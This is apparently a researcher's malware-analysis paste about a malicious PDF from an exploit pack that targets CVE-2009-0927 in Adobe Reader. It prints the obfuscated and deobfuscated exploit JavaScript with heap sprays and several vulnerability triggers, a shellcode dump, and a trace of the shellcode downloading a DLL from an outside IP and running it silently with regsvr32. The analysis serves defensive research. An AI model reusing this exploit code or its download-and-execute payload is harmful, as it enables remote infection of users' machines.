Advertisement
unixfreaxjp

#Malware Anlsys PDF/CVE-2009-0927/Adobe getIcon Exploit Pack

Apr 19th, 2012
27,937
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Virus Total report is:
  2. https://www.virustotal.com/file/16e7b2f923b0c6f4c194ae791848b70030fa2093da0ee95a3ee926abd679fb81/analysis/
  3.  
  4. Sample:
  5. MD5: 5e77446f3a89fac8cabb49b69cb1471c
  6. File size: 11.8 KB ( 12088 bytes )
  7. File name: dropped.pdf
  8. File type: PDF
  9.  
  10. This is the malware PDF file to exploit your PC's with CVE-2009-0927 (Adobe getIcon flaw), then downloading the payload and runs it as process/daemon in your PC. This Malicious PDF is used by infection components by several Exploit Pack to infect malwares like ZeuS/Caberp/Ramnit, etc. Below is the analysis in details:
  11. =====================
  12. Found Here:
  13. =====================
  14. [code] --00:40:54-- hxxp://91.205.74.23/content/adp1.php?f=172
  15. => `adp1.php@f=172'
  16. Connecting to 91.205.74.23:80... connected.
  17. HTTP request sent, awaiting response... 200 OK
  18. Length: 12,088 (12K) [application/pdf]
  19. 100%[====================================>] 12,088 --.--K/s
  20. 00:40:54 (3.52 MB/s) - `adp1.php@f=172' saved [12088/12088] [/code]
  21.  
  22. =====================
  23. Malware PDF Structure is:
  24. =====================
  25. [code] %PDF-1.6
  26. %粤マモ
  27. 7 0 obj
  28. <</Count 1/Type/Pages/Kids「28 0 R」>>
  29. endobj
  30. 21 0 obj
  31. <</Names 23 0 R/AcroForm 22 0 R/Pages 7 0 R/OCProperties<</D<</RBGroups「」>>>>/StructTreeRoot 11 0 R/Type/Catalog>>
  32. endobj
  33. 23 0 obj
  34. <</JavaScript 24 0 R/AP 8 0 R>>
  35. endobj
  36. 24 0 obj
  37. <</Names「123 0 R 76 0 R」>>
  38. endobj
  39. 25 0 obj
  40. <</S/JavaScript/JS 26 0 R>>
  41. endobj
  42. 26 0 obj
  43. <</Length 1108/Filter「/FlateDecode」>>stream
  44. endstream
  45. endobj
  46. 28 0 obj
  47. <</Parent 7 0 R/Contents 60 0 R/Rotate 90/MediaBox「0 0 12 92」/Resources<</XObject<</Im0 69 0 R>>/ColorSpace<</CS0 59 0 R>>/Font<</TT0 61 0 R>>/Properties/ExtGState>>/Type/Page>>
  48. endobj
  49. 60 0 obj
  50. <</Length 539/Filter/FlateDecode/Type/Contents>>stream
  51. endstream
  52. endobj
  53. 76 0 obj
  54. <</S/JavaScript/JS(
  55. x='e';
  56. arr='71@2@53@69@53@59@3@59@17@17@0@32@57@20@6@59@36@35@41@42@38@38@36@35@2@60@69@15@36@35@41@26@2@60@36@35@45@26@69@15@36@35@69@7@42@15@36@35@42@42@26@2@36@35@38@15@60@5@36@35@15@5@41@0@36@35@41@0@42@5@36@35@5@60@15@5@36@35@45@5@41@0@36@35@26@38@3@60@36@35@45@38@41@0@36@35@42@42@5@41@36@35@38@38@40@0@36@35@26@69@41@0@36@35@5@42@42@60@36@35@42@42@45@15@36@35@...........
  57. ...........
  58. ...........
  59.  
  60. 8@39@29@67@70@71@57@48@68@69@40@71@49@48@23@69@37@56@10@49@39@69@28@53@23@35@10@10@17@55@25@60@49@67@60@70@53@69@17@29@25@49@53@17@55@25@25';
  61. cc={q:'b+f1k0=9-vl&WA|4 \)<:gDQnS}5zr{oVjpNu%w6yd83_,7EG.a@2>\(I;PsM"c「/Cx」Ktmehi*Uq"'}.q;
  62. q=x+'v'+'al';
  63. a=\(Date+String\).substr\(2,3\);
  64. aa=\(「」.unshift+「」.reverse\).substr\(2,3\);
  65. if \(aa==a\){
  66. t='3vtwe';
  67. e=t「'substr'」;
  68. w=e\(12\)「q」;
  69. s=「」;
  70. ar=arr.split\('@'\);
  71. n=cc;
  72. for\(i=0;i<ar.length;i++\){
  73. s「i」=n「ar「i」」;
  74. }
  75. if\(a===aa\)w\(s.join\(''\)\);
  76. }
  77. )>>
  78. endobj
  79. xref
  80. 0 155
  81. trailer
  82. <</Size 155
  83. /Root 21 0 R>>
  84. xref
  85. 0 0
  86. trailer
  87. <</Size 155/Prev 75626/XRefStm 416/Root 21 0 R>>
  88. startxref
  89. 78995
  90. %%EOF [/code]
  91.  
  92. =====================
  93. If you deobfs the JS, E v a l value came up:
  94. =====================
  95. [code] if (e("1"))bjsg = "
  96. %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db
  97. %u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175
  98. %uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33
  99. %ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b
  100. %uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433
  101. %u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68
  102. %u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d
  103. %u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224
  104. %u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b
  105. %uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830
  106. %u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83
  107. %u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff
  108. %ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f
  109. %u7468%u7074%u2f3a%u392f%u2e31%u3032%u2e35%u3437%u322e%u2f33%u2e77%u6870%u3f70%u3d66%u3731
  110. %u2632%u3d65%u0033%u0000";
  111. function ezvr(ra, qy){
  112. while (ra.length * 2 < qy){
  113. ra += ra;
  114. }
  115. ra = ra.substring(0, qy
  116. /2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var
  117. payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=une
  118. scape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;
  119. for (var count = 0; count < count2; count ++ ){
  120. dkg「count」 = yarsp + payload;
  121. }
  122. var overflow = unescape("%u0c0c%u0c0c");
  123. while (overflow.length < 44952){
  124. overflow += overflow;
  125. }
  126. this .collabStore = Collab.collectEmailInfo({
  127. subj : "", msg : overflow
  128. }
  129. );
  130. }
  131. function printf(){
  132. nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  133. var payload = unescape(bjsg);
  134. heapblock = nop + payload;
  135. bigblock = unescape("%u0A0A%u0A0A");
  136. headersize = 20;
  137. spray = headersize + heapblock.length;
  138. while (bigblock.length < spray){
  139. bigblock += bigblock;
  140. }
  141. fillblock = bigblock.substring(0, spray);
  142. block = bigblock.substring(0, bigblock.length - spray);
  143. while (block.length + spray < 0x40000){
  144. block = block + block + fillblock;
  145. }
  146. mem = new Array();
  147. for (i = 0; i < 1400; i ++ ){
  148. mem「i」 = block + heapblock;
  149. }
  150. var num =
  151. 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
  152. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  153. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  154. 88888888888888888888888888;
  155. util.printf("%45000f", num);
  156. }
  157. function geticon(){
  158. var arry = new Array();
  159. if (app.doc.Collab.getIcon){
  160. var payload = unescape(bjsg);
  161. var hWq500CN = payload.length * 2;
  162. var qy = 0x400000 - (hWq500CN + 0x38);
  163. var yarsp = unescape("%u9090%u9090");
  164. yarsp = ezvr(yarsp, qy);
  165. var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
  166. for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
  167. arry「vqcQD96y」 = yarsp + payload;
  168. }
  169. var tUMhNbGw = unescape("%09");
  170. while (tUMhNbGw.length < 0x4000){
  171. tUMhNbGw += tUMhNbGw;
  172. }
  173. tUMhNbGw = "N." + tUMhNbGw;
  174. app.doc.Collab.getIcon(tUMhNbGw);
  175. }
  176. }
  177. aPlugins = app.plugIns;
  178. var sv = parseInt(app.viewerVersion.toString().charAt(0));
  179. for (var i = 0; i < aPlugins.length; i ++ ){
  180. if (aPlugins「i」.name == "EScript"){
  181. var lv = aPlugins「i」.version;
  182. }
  183. }
  184. if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){
  185. geticon();
  186. }
  187. else if (lv == 7.1){
  188. printf();
  189. }
  190. else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){
  191. bx();
  192. }
  193. else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){
  194. function a(){
  195. util.printd("p@111111111111111111111111 : yyyy111", new Date());
  196. }
  197. var h = app.plugIns;
  198. for (var f = 0; f < h.length; f ++ ){
  199. if (h「f」.name == "EScript"){
  200. var i = h「f」.version;
  201. }
  202. }
  203. if ((i > 8.12) && (i < 8.2)){
  204. c = new Array();
  205. var d = unescape("%u9090%u9090");
  206. var e = unescape(bjsg);
  207. while (d.length <= 0x8000){
  208. d += d;
  209. }
  210. d = d.substr(0, 0x8000 - e.length);
  211. for (f = 0; f < 2900; f ++ ){
  212. c「f」 = d + e;
  213. }
  214. a();
  215. a();
  216. try {
  217. this .media.newPlayer(null);
  218. }
  219. catch (e){
  220. }
  221. a();
  222. }
  223. }[/code]
  224.  
  225. =====================
  226. Exploits found to execute malware downloads:
  227. =====================
  228. [code] CVE: CVE-2009-0927
  229. Desc: Adobe getIcon
  230. Expl: Stack-based buffer overflow in Adobe Reader and Acrobat
  231. via the getIcon method of a Collab object [/code]
  232.  
  233. =====================
  234. Exploit Code:
  235. =====================
  236. [code] 4e 2e 09 09 09 09 09 09 09 09 09 09 09 09 09 09
  237. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
  238. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
  239. ...MORE 16,288 BYTES...
  240. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
  241. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
  242. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
  243. 09 09 [/code]
  244.  
  245. =====================
  246. Shellcode:
  247. =====================
  248. [code] 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 c0 64 8b 40
  249. 30 8b 40 0c 8b 70 1c 56 8b 76 08 33 db 66 8b 5e
  250. 3c 03 74 33 2c 81 ee 15 10 ff ff b8 8b 40 30 c3
  251. 46 39 06 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51
  252. 56 8b 75 3c 8b 74 35 78 03 f5 56 8b 76 20 03 f5
  253. 33 c9 49 41 fc ad 03 c5 33 db 0f be 10 38 f2 74
  254. 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 e6 5e 8b 5e
  255. 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 24 0c 8b d8
  256. 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb 53 ad 8b 68
  257. 20 80 7d 0c 33 74 03 96 eb f3 8b 68 08 8b f7 6a
  258. 05 59 e8 98 ff ff ff e2 f9 e8 00 00 00 00 58 50
  259. 6a 40 68 ff 00 00 00 50 83 c0 19 50 55 8b ec 8b
  260. 5e 10 83 c3 05 ff e3 68 6f 6e 00 00 68 75 72 6c
  261. 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff ff ff eb 02
  262. eb 72 81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72
  263. 65 67 73 c7 44 24 04 76 72 33 32 c7 44 24 08 20
  264. 2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9
  265. 51 c7 44 1d 00 77 70 62 74 c7 44 1d 05 2e 64 6c
  266. 6c c6 44 1d 09 00 59 8a c1 04 30 88 44 1d 04 41
  267. 51 6a 00 6a 00 53 57 6a 00 ff 56 14 85 c0 75 16
  268. 6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ff 56 04 83
  269. c3 0c eb 02 eb 13 47 80 3f 00 75 fa 47 80 3f 00
  270. 75 c4 6a 00 6a fe ff 56 08 e8 9c fe ff ff 8e 4e
  271. 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca 8a 5b 1b c6
  272. 46 79 36 1a 2f 70 68 74 74 70 3a 2f 2f 39 31 2e
  273. 32 30 35 2e 37 34 2e 32 33 2f 77 2e 70 68 70 3f
  274. 66 3d 31 37 32 26 65 3d 33 00 00 00 [/code]
  275. =====================
  276. Shellcode execution commands(uses: kernel32.DLL & urlmon.DLL)
  277. =====================
  278. [code] 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
  279. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  280. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  281. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=hxxp://91.205.74.23/w.php?f=172&e=3, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
  282. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  283. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  284. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0) [/code]
  285. =====================
  286. Shellcode Meanings:
  287. =====================
  288. [code] Preps env to exec command, call urlmon libs to download hxxp://91.205.74.23/w.php?f=172&e=3
  289. then save it at C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll and then execute it SILENTLY w/ WinEXEC &
  290. also register it ro runs as process/daemon w/ registry command. and then exit. [/code]
  291.  
  292. ------
  293. ZeroDay Japan http://0day.jp
  294. OPERATION CLEANUP JAPAN | #OCJP
  295. Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
  296. sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com
Advertisement
RAW Paste Data Copied
Advertisement